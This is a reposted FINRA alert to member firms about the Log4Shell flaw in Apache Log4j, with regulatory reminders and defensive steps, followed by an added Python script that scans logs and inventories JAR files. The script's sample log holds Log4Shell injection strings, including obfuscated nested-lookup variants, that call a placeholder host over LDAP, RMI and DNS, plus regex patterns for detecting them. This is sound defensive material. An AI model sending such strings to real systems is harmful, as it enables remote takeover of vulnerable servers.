Aggregated News From Investment Management Regulators

FINRA Alerts Firms to “Log4Shell” Vulnerability in Apache Log4j Software

FINRA is alerting firms to a recently identified vulnerability in Apache Log4J software, which is an open-source, Java-based logging utility widely used by enterprise applications and cloud services. The “Log4Shell” vulnerability presents risk for member firms because they may be using this software in internal applications, or the software may be embedded in third-party software packages. In addition, many applications written in Java are potentially vulnerable.

Bad actors may take advantage of this vulnerability to compromise systems to potentially steal information or engage in fraudulent activities. For example, a remote attacker can exploit this vulnerability to take control of an affected system.

FINRA reminds firms that the U.S. Securities and Exchange Commission’s (SEC) Regulation S-P Rule 30 requires firms to have written policies and procedures that are reasonably designed to safeguard customer records and information, and that FINRA Rule 4370 (Business Continuity Plans and Emergency Contact Information) also applies to denials of service and other interruptions to members’ operations. In addition to firms’ compliance with SEC regulations, FINRA expects firms to develop reasonably designed cybersecurity programs and controls that are consistent with their risk profile, business model and scale of operations.

For more information, firms should review the resources provided on FINRA’s Cybersecurity Topic Page.

Next Steps

FINRA recommends member firms consider engaging their Technology staff along with third-party vendors, including any IT service providers, and taking the following steps:

  1. Leverage indicators of compromise (IOCs) associated with the vulnerability and take the following steps:
    1. Monitor network and server activity to identify attempts to exploit the vulnerability, including by matching industry-provided IOCs.
    2. Review historical log data including past network and server activity to identify IOCs that would indicate a bad actor has exploited the vulnerability in your environment.
    3. If the IOCs are confirmed in your environment, consider implementing your incident response plan and handling this as a high-risk cybersecurity incident.
    4. If applicable, respond and recover from the intrusion following the steps in your incident response plan.
  2. Consider evaluating firm (and, if applicable, vendors’) firewalls to address additional risks relating to the vulnerability:
    1. Evaluate firewall rules for outbound traffic and consider adding rule(s) to block traffic to suspicious or unknown locations (e.g., outbound egress filtering).
    2. Confirm that any internet-facing application systems using Apache Log4J are protected by a web application firewall to provide protection against traffic that includes signatures known to be malicious.
  3. Review firms’ internally maintained application systems to determine if any are at risk from the vulnerability:
    1. Conduct an inventory of all internal systems to identify any that are using the Apache Log4J vulnerable code.
    2. For the systems identified, either apply the security patch for Apache Log4J or upgrade to the latest version of the software that includes the fix (Apache Log4J 2.15 or later).
    3. Test the updated software before releasing into your production environment.
    4. Confirm that the updated Apache Log4j software is applied to all devices that use the software.
  4. Evaluate third-party vendors’ systems to determine whether they have been impacted by the vulnerability:
    1. Contact your software application vendors and ask them if any of their systems contain the vulnerable Apache Log4j software. For example, vendors such as Cisco, VMware, and Red Hat have issued advisories about potentially vulnerable products.
    2. If so, ask vendors how they plan to update their system to address the vulnerability.
    3. Receive and test the updated software from vendors before releasing into your production environment.
    4. Confirm that the updated Apache Log4j software is applied to all devices that use the software.
  5. Continue monitoring threat information and updates through multiple intelligence sources including, but not limited to:
    1. Cybersecurity and Infrastructure Security Agency (CISA);
    2. FS-ISAC; and
    3. Your preferred threat intelligence sources, including any third-party security systems or tools providers.
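Two of the steps above, reviewing historical log data for exploitation attempts (step 1.2) and inventorying internal systems for the vulnerable Log4j code (step 3.1), can be scripted. The following is an added example written for this page; it is not FINRA's code and not part of the notice. It assumes Apache-style access logs and a directory of JAR/WAR/EAR files; every input is constructed for the demo (the log lines, the `*.example.invalid` hostnames, and the stand-in JARs it builds in a temporary directory), and the 2.15 threshold is taken from the notice's own fix version. The log scan goes one step beyond a plain substring match by collapsing the nested-lookup wrappers Log4j itself resolves, so obfuscated variants of the same lookup are still reported.

```python
"""Added example (not from the FINRA notice): defender-side checks for steps 1.2
and 3.1 of the Next Steps list. scan_log_lines() reviews log data for Log4Shell
lookup strings, including nested-lookup obfuscations that a plain "${jndi:"
substring match misses; inventory_jars() walks a directory tree, opens every
JAR/WAR/EAR (and JARs bundled inside them) and reports log4j-core versions
below 2.15, the fix version the notice cites. All inputs are constructed for
the demo: log lines, *.example.invalid hosts, and JAR fixtures in a temp dir."""
import io
import re
import tempfile
import zipfile
from pathlib import Path

FIXED_VERSION = (2, 15, 0)  # "Apache Log4J 2.15 or later" per the notice

# --- Step 1.2: Log4j resolves ${...} lookups recursively, so "jndi" can hide in
# ${lower:j}, ${upper:J} or ${anything:-j}; collapse those, then match ${jndi:.
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^}$]+)\}", re.IGNORECASE)
_DEFAULT_WRAPPER = re.compile(r"\$\{[^}$]*:-([^}$]*)\}")
_JNDI_PREFIX = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def normalize(text: str) -> str:
    """Undo nested-lookup obfuscation so the outer lookup becomes visible."""
    previous = None
    while previous != text:
        previous = text
        text = _DEFAULT_WRAPPER.sub(r"\1", _CASE_WRAPPER.sub(r"\1", text))
    return text

def scan_log_lines(lines):
    """Return (line_number, line) for each line carrying a JNDI lookup."""
    return [(n, ln) for n, ln in enumerate(lines, 1) if _JNDI_PREFIX.search(normalize(ln))]

# Constructed access-log sample: one plain lookup, two obfuscated ones.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:02:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup.example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:09 +0000] "GET /login HTTP/1.1" 200 77 "-" "${${lower:j}ndi:rmi://lookup.example.invalid/b}"',
    '10.0.0.9 - - [10/Dec/2021:13:02:11 +0000] "GET /login HTTP/1.1" 200 77 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://lookup.example.invalid/c}"',
    '10.0.0.7 - - [10/Dec/2021:13:03:00 +0000] "GET /static/app.js HTTP/1.1" 304 0 "-" "curl/7.79"',
]

# --- Step 3.1: inventory systems for the vulnerable log4j-core code ---
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")

def parse_version(text: str) -> tuple:
    return tuple(int(p) for p in re.findall(r"\d+", text)[:3])

def inspect_archive(data: bytes, label: str, findings: list, depth: int = 0) -> None:
    """Record log4j-core artifacts in one archive, recursing into bundled JARs."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = parse_version(line.split("=", 1)[1])
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            # Lookup class present but version unreadable: treat as at risk.
            vulnerable = has_jndi and (version is None or version < FIXED_VERSION)
            findings.append({"path": label, "version": version, "vulnerable": vulnerable})
        if depth < 2:  # WARs and fat JARs bundle libraries a level or two down
            for name in names:
                if name.lower().endswith(ARCHIVE_SUFFIXES):
                    inspect_archive(zf.read(name), f"{label}!{name}", findings, depth + 1)

def inventory_jars(root) -> list:
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                inspect_archive(path.read_bytes(), str(path), findings)
            except zipfile.BadZipFile:
                continue  # not a real archive; skip it rather than abort the sweep
    return findings

def _make_jar(version: str) -> bytes:
    """Constructed stand-in for log4j-core holding only the two entries scanned."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()

def demo_inventory() -> list:
    """Build a constructed deployment tree in a temp dir and inventory it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "lib").mkdir()
        (root / "lib" / "log4j-core-2.14.1.jar").write_bytes(_make_jar("2.14.1"))
        (root / "lib" / "log4j-core-2.15.0.jar").write_bytes(_make_jar("2.15.0"))
        war = io.BytesIO()
        with zipfile.ZipFile(war, "w") as zf:  # old copy bundled inside a WAR
            zf.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", _make_jar("2.13.3"))
        (root / "app.war").write_bytes(war.getvalue())
        return inventory_jars(root)

if __name__ == "__main__":
    print(scan_log_lines(SAMPLE_LOG))
    print(demo_inventory())
```

Run as a script it prints the three flagged log lines and the three findings (2.14.1 and the 2.13.3 copy inside the WAR flagged, 2.15.0 not). For a real sweep, call `inventory_jars("/opt/apps")` (placeholder path) and feed `scan_log_lines` the lines of the actual log files; a finding with `version` of `None` means the lookup class was found but the Maven metadata was missing, which is the conservative reason it is still reported.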

Questions regarding this Notice should be directed to:

  • Dave Kelley, Director, Member Supervision Specialist Programs, at (816) 802-4729 or by email; or
  • Greg Markovich, Senior Principal Risk Specialist, Member Supervision Specialist Programs, at (312) 899-4604 or by email.

Additional Resources

This news item was originally published by the Financial Industry Regulatory Authority (FINRA US). For more information, see the Source Link.

Regulator Information

Abbreviation: FINRA
Jurisdiction: United States
